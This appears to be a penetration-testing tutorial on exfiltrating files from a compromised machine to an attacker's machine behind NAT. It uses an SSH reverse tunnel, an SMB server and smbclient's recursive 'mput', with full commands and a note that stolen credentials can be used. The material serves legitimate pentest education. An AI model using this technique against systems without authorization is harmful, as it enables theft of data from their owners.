File transfer from compromised machine to attacking machine via SSH tunnel with SMB service
(Useful when attacking machine is behind Dynamic NAT and not reachable directly from internet.)
Motive of demonstration:
We have plenty of file transfer mechanism to be used during an engagement of penetration testing and one of them is making transfers through SMB services.
If we are engaged in a penetration testing and need to transfer some files from compromised machine to attacking machine we can use smb service to do the job in a certain condition with SSH tunneling securing the whole transfer process.
SSH tunneling can also help smbcleint reaching smb server via loopback address “127.0.0.1” without need of a public IP that will not reach our attacking machine sitting behind a NAT environment.
Why SMB Service?
File transfer can be done with other services also like SCP, Rsync, FTP, tFTP, To some extent Web Server (Supports one way transfer) and these services may be present in Linux machine but not necessarily in Windows machine.
When we use SMB service for file transfer we can use this service from both machines Linux as well as Windows equally.
The only difference is that Windows copy utility can perform read write activity on network resources as well as local recourses hence for windows no additional utility is required to communicate with SMB server for file read and write.
For Linux SMB client utility is required to perform this task as Linux inbuilt utility “cp” does not have capability of reading and writing data on network resources directly as windows “copy” utility does.
The conditions:
Attacking machine is under Dynamic NAT environment (That is normal thing if we are connecting from behind a normal WiFi router).
We have managed to get username and password for making ssh connection from our attacking machine.
For demonstration purpose I have used two Linux machines. Though it could be Linux and windows also
Remote machine -> Hostname: Kali_on_Cloud (A Kali instance in cloud)
Local machine -> Hostname: Kali (A local instance of Kali running on my laptop)
Lets take a start …
File transfer from victim to attacking machine is crucial and a bit tricky to handle.
Though of victim is Linux machine you have already SSH and so SCP installed by default to be used as a LIVING OFF THE LAND tools and no tool or executable binary need to be deployed there the issue I observed is copying a file through SCP is easy but copying entire folder is killing and quite horrendous as it huge amount of time
The other option I could find for making my job easy is to use SMB protocol to share the file from one end to another end.
Though I could have executed a smb server at remote machine (a cloud instance of kali I have) and establish a connection from my local kali instance if I had root privilege on compromised machine but want to do it other way assuming I do not have root privilege on remote machine (Though here I am using root user to connect to my kali instance in cloud and using it just for demonstration purpose)
Since I can not run smb service due to least privilege (assumption here) and wanted to run the SMB server in my local kali instance and connect from remote machine but can not do this due to my machine not accessible directly from internet instead it sits behind a Dynamic NAT environment.
So a simple rule is there if you are behind Dynamic NAT (Not static or One to one NAT) and without a port forwarding to your machine’s private IP some one wants to connect to your machine from out side (Internet), he cannot do this as your machines IP would be dynamically NATed private IP and the connection that attempts to connect to your machine will be using your public a IP. Without proper port forwarding router will not know where this should send the connection traffic.
Since there is no Static NAT in my internet router configured I would not be able to connect to my machine behind the Dynamic NAT from remote machine.
Option for this is to Either I set a port forward on my internet router so that if any remote connection comes to my public IP on any specific port my internet router should route to my machine or I should set a ONE to ONE (Static ANT) which is not possible in normal internet router.
In this situation the best way to deal with this is the SSH connection with some gymnastics of SSH tunneling.
This needs to be kept in mind that every connection to be established has only one direction and that is from my local machine to remote machine and NOT vice versa.
While establishing SSH connection needs to be created a remote port forwarding to expose my local samba service to the remote port of the remote machine
When it is done smbclient does not require to connect to smb service running on my local machine with public IP but a loopback IP 127.0.0.1 which the SSH tunnel is using for port forwarding.
Lets begin …
Lets run smb server now in local machine — Lets try fist the easy way of running smb server using smbserver.py from impacket python module.
Lets connect to cloud instance of kali with ssh.
Connection established from local kali instance to the kali instance in cloud.
Lets check from cloud instance of kali if smb service is listening on 127.0.0.1 at port 445.
No it is not listening. Means there is no SSH tunnel still created that does the port forwarding between my local machine and the remote machine.
Lets do it…
This time I will exit from the ssh connection and re-establish but with port forwarding instructions.
root@kali:~# ssh -i /root/kali_on_cloud/id_rsa -R 445:127.0.0.1:445 root@165.xxx.xx.xxx
What above command doing is…
It is creating a ssh tunnel from my local kali instance to remote machine with a remote port forward. Means when I am exposing my SMB service running locally on port 445 to the remote machine’s port 445.
If someone connects to port 445 on remote machine with loop back address 127.0.0.1 that ssh tunnel is using for port forwarding it will reach port 445 on my local machine and access the service running on it locally.
SSH connection established from local kali instance to kali instance on cloud (remote machine). SMB server is also running in local kali instance and port forwarding is also enabled through created ssh tunnel.
Lets check from remote machine if now it is able to access smb service running on my local machine by connecting to the loopback address 127.0.0.1 on port local port 445 (Here local from remote machine’s perspective).
Yes it does now!
Netcat shows connection is open on smb port and a connection has also been received at local kali instance side below where SMB server is running.
Lets connect now to smb share from remote machine. (Direction of connection: Cloud instance of KALI/smbclient -> Local instance of KALI/smb_share as we cant reach our kali from remote machine due to being it being NAT environment.)
smbclient -U root%VerySecret123 -p 445 //127.0.0.1/myshare
Smbclient connected to smb share being shared by smbserver.py.
Everything is ok so far but found some issues with smb server script of impacket.
While copying files and folders I observed an issue with smbserver.py. Putting the files from remote machine to smb share looked to be fine but when it came to copy the folder, smbserver.py used to close the connection. It exhibited instability
So I thought to give it a try by starting samba server in my local kali instead executing smbserver.py from imapcket python module.
For this I made some changes in my local kali
root@kali:~# mkdir /media/share (created a shared folder)
root@kali:~# adduser — system username (created a username who can access)
root@kali:~# chown -R username /media/share (Assigning user the ownership of the share folder)
root@kali:~# smbpasswd -a username (Creates smb password for the newly created user ans andd that to samba service. This password is different from Linux user password)
root@kali:~# smbpasswd -e username (Enables the newly created username)
Added below config in “/etc/sama/smb.conf” file
# share
[myshare]
path = /media/share
valid users = username
writeable = yes
browseable = yes
create mask = 0644
directory mask = 0755
force user =username
Starting samba service in local kali (assumed to be attacking machine).
root@kali:~# Systemctl start smbd (started samabservice)
Lets begin again by connecting the smbclient from remote machine to smb share being served by samba server running my local machine.
root@kali:~# ssh -i /root/kali_on_cloud/id_rsa -R 445:127.0.0.1:445 root@165.xxx.xx.xxx
#-R for remote port forwarding
Since Smb service is already running on port 445 at local machine so SSH cannot listen on local port 445 hence the only option is to listen on the port 445 of the remote machine side of the tunnel as it is free.
Note:
Instead of root user any user that has been compromised or user credential stolen can be used to connect to while pentesting.
After connection is established with remote machine I can see some files and folders as below which need to be copied to my local machine by using smb service.
Ok… Lets give a try again.
Lets check if smb server running in my local machine is accessible through SSH port forwarding if a connection is made from remote machine on its loopback address and its local port 445.
Yes it is connecting to service through its loopback address that is being used by SSH tunnel between my local machine and remote machine
It is time to connect to SMB share with smbclient already installed in remote machine.
root@Kali_on_cloud:~#smbclient -U smb_user%smb_password -p 445 //127.0.0.1/myshare
Edit: ZSH interpret the command in below order
root@Kali_on_cloud:~#smbclient -p 445 //127.0.0.1/myshare -U smb_user%smb_password
And yes connection established as expected.
Before copying the files from remote machine to my local machine lets check if I have anything in my local machine’s share folder.
No still no file or folder is there.
Lets run below commands at smbclient shell at remote machine.
smb: \> recurse ON (directs smbcleint to recurse on the folders and sub folders)
smb: \> prompt OFF (directs smbclient not to prompt for permission while copying the file and folders)
smb: \> mput * (put copies one file from local to remote machine. Mput does it massively)
Lets check the result.
Hmmm….. The files started to be copied from remote machine to local machine.
Lets check if we have really got some files or folders from remote machine to our local machine.
Yes it succeeded and we have a copy of files from remote machine in our local machine.
Conclusion of this demonstration:
If you have a situation where no SCP/Rsync/FTP etc. are available but smbclient is available SMB service can be used as through this service firetranfer can be performed on both kind of machines Linux as well as Windows.
Windows has an advantage over Linux on this as this does not required any additional utility to do the transfer job as its “copy” utility is enough to perform read and write activity on network resources and also performs faster than smbclient while transfer job.
SSH help do this file transfer job when cnnection cannot be made to attacking machine directly from internet due to attacking machine sitting on behind a NAT environment with a private IP.
Give a try for SMB Service with SSH tunneling technique for a file transfer. It will make your life a bit easy.
